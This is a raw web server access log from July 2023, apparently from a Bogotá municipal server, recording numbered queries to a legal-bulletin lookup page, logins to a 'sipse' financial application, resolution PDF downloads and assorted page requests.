172.22.2.4 - - [19/Jul/2023:09:08:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5691&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:08:56 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5692&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:07:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61035
172.22.2.4 - - [19/Jul/2023:09:08:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5693&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5694&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5695&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:06 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5696&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
179.19.223.11 - - [19/Jul/2023:09:09:06 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&gclid=EAIaIQobChMI-Z3e-_iagAMVzJ9kCh0AVQTYEAEYASAAEgIcmfD_BwE HTTP/1.1" 200 783
172.22.2.4 - - [19/Jul/2023:09:09:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5697&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:11 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5698&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:13 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5699&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:18 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5700&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
64.124.8.52 - - [19/Jul/2023:09:09:20 -0500] "GET /galeria/galeria/fotos/Soratama2P.jpg HTTP/1.1" 200 10548
172.22.2.4 - - [19/Jul/2023:09:09:20 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5701&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5702&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:25 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5703&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5704&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:31 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5705&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5706&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:37 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5707&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5708&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5709&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:44 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5701&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:47 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5710&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:49 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5711&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5712&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5713&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:56 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5714&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5715&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [19/Jul/2023:09:09:59 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [19/Jul/2023:09:10:00 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [19/Jul/2023:09:10:00 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [19/Jul/2023:09:10:00 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [19/Jul/2023:09:10:00 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [19/Jul/2023:09:10:00 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [19/Jul/2023:09:10:00 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [19/Jul/2023:09:10:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5716&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:02 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [19/Jul/2023:09:10:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
201.245.192.253 - - [19/Jul/2023:09:10:02 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12182
201.245.192.253 - - [19/Jul/2023:09:10:02 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.192.253 - - [19/Jul/2023:09:10:03 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
172.22.2.4 - - [19/Jul/2023:09:10:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5717&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:05 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5718&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:07 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5719&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:09 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0046&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1300
172.22.2.4 - - [19/Jul/2023:09:10:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5720&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:10 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11183
201.245.192.253 - - [19/Jul/2023:09:10:10 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
201.245.192.253 - - [19/Jul/2023:09:10:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:11 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
172.22.2.4 - - [19/Jul/2023:09:10:12 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5721&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:14 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5612
172.22.2.4 - - [19/Jul/2023:09:10:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5722&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:14 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 16345
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
201.245.192.253 - - [19/Jul/2023:09:10:15 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
201.184.115.50 - - [19/Jul/2023:09:10:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0046.pdf HTTP/1.1" 200 405139
201.245.192.253 - - [19/Jul/2023:09:10:16 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
201.245.192.253 - - [19/Jul/2023:09:10:16 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9852
172.22.2.4 - - [19/Jul/2023:09:10:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5723&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:18 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
172.22.2.4 - - [19/Jul/2023:09:10:18 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5724&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:19 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 36160
201.245.192.253 - - [19/Jul/2023:09:10:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
172.22.2.4 - - [19/Jul/2023:09:10:20 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5725&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5726&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 138329
201.245.192.253 - - [19/Jul/2023:09:10:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.1 - - [19/Jul/2023:09:10:28 -0500] "GET /reportes_sipse/sdg/ServletViabilidad?reporte=memo_viabilidad&solicitud=22055 HTTP/1.1" 200 1538
201.245.192.253 - - [19/Jul/2023:09:10:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36875
201.245.192.253 - - [19/Jul/2023:09:10:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 183921
201.245.192.253 - - [19/Jul/2023:09:10:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
110.249.202.74 - - [19/Jul/2023:09:10:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2965.pdf HTTP/1.1" 200 643514
172.22.2.4 - - [19/Jul/2023:09:10:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5730&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 33036
172.22.2.4 - - [19/Jul/2023:09:10:37 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5731&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [19/Jul/2023:09:10:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [19/Jul/2023:09:10:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1376
172.22.2.4 - - [19/Jul/2023:09:10:40 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5732&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5733&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:45 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5734&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:47 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5735&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:50 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5736&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:52 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5737&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:10:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5738&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
173.252.79.5 - - [19/Jul/2023:09:10:58 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [19/Jul/2023:09:10:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5739&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [19/Jul/2023:09:11:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5740&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
191.156.230.125 - - [19/Jul/2023:09:11:51 -0500] "GET /css/textos.css HTTP/1.1" 404 1254
191.156.230.125 - - [19/Jul/2023:09:11:51 -0500] "GET /css/date_blue.css HTTP/1.1" 404 1254
191.156.230.125 - - [19/Jul/2023:09:11:51 -0500] "GET /css/fondos.css HTTP/1.1" 404 1254
186.102.100.172 - - [19/Jul/2023:09:11:52 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&gclid=EAIaIQobChMIjYy7yPmagAMVq_fnAx1VZApjEAEYASAAEgKTNvD_BwE HTTP/1.1" 200 783
172.22.2.4 - - [19/Jul/2023:09:11:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5654&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1461
191.156.230.125 - - [19/Jul/2023:09:11:55 -0500] "GET /css/bordes.css HTTP/1.1" 404 1254
172.22.2.4 - - [19/Jul/2023:09:11:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5654&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1461
172.22.2.4 - - [19/Jul/2023:09:11:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5654&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1461
